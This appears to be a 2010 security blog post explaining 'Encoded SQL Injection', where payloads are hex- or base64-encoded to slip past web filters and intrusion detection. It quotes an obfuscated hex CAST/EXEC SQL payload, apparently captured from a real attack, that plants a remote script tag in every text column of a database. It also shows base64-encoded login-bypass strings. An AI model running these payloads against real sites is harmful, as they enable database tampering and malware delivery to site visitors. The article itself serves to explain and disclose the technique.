Encoded SQL Injection vulnerabilities

22:48 25.12.2010

This is English version of my Encoded SQL Injection vulnerabilities article.

In article Advanced methods of SQL Smuggling, I mentioned about Encoded SQL Injection - new class of SQL Injection, which I found in 2009. I.e. this is subclass of SQL Injection vulnerabilities. And now I’ll tell you about it in detail.

Last year, 17.05.2009, I found SQLi vulnerability which I related to new type of SQL Injection - Encoded SQL Injection. About Encrypted XSS (Encoded XSS) I already mentioned many times, and in this article I’d tell about Encoded SQLi. In classification of SQL Injection vulnerabilities (in 2008) I gave two types of SQLi - Reflected SQL Injection and Persistent SQL Injection. So Encoded SQL Injection will be third type.

These vulnerabilities allow to bypass protection systems - as built-in in web application protection filters, as installed at the server IDS, IPS and WAF systems. Therefore I related this type of SQL Injection vulnerabilities to advanced methods of SQL Smuggling.

Types of Encoded SQL Injection.

There are next types of Encoded SQL Injection:

  • Partly encoded SQLi.
  • Completely encoded SQLi.

If first type still can be revealed by some protection systems (if they set on appropriate operators of SQL language), then second type will not be entirely revealed by current protections systems. Besides those systems which support decoding of this encoding method.

Partly encoded SQLi.

In case of partly encoded SQL Injection, data which is sending to DBMS is encoding only partly. It’s when only some part of SQL code is encoded (e.g. via CAST). Encoding of strings for bypassing of quotes filtration is not relating to this.

As in case mentioned in the post Encoded SQL Injection, when this type of SQLi is using for attack on one site (at that on usual SQLi vulnerability):

DECLARE @S NVARCHAR(4000);SET @S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200 AS NVARCHAR(4000));EXEC(@S);--

Completely encoded SQLi.

In case of completely encoded SQL Injection, data which is sending to DBMS is encoding completely. So the whole SQL query is encoded (at interface level) and only at web application level it is decoding for sending to DBMS. Particularly in variant of encoded SQL Injection, which I found last year, base64 encoding is using.

When web application is using base64-stings for sending of values to web application, it can be used for conducting of Encoded SQLi attacks.

For example, string ‘ or 1=1# will become JyBvciAxPTEj. And string ‘ and 1=’1 will become JyBhbmQgMT0nMQ==.

And at level of external protection systems, which don’t support decoding of data which is sending to web application, these and other encoded strings will not cause any suspicions. So installed at the server IDS, IPS and WAF systems will can’t reveal these attack (and it’ll be hard to reveal them in the logs). And these attacks will pass successfully bypassing of protection systems.

Leave a Reply

You must be logged in to post a comment.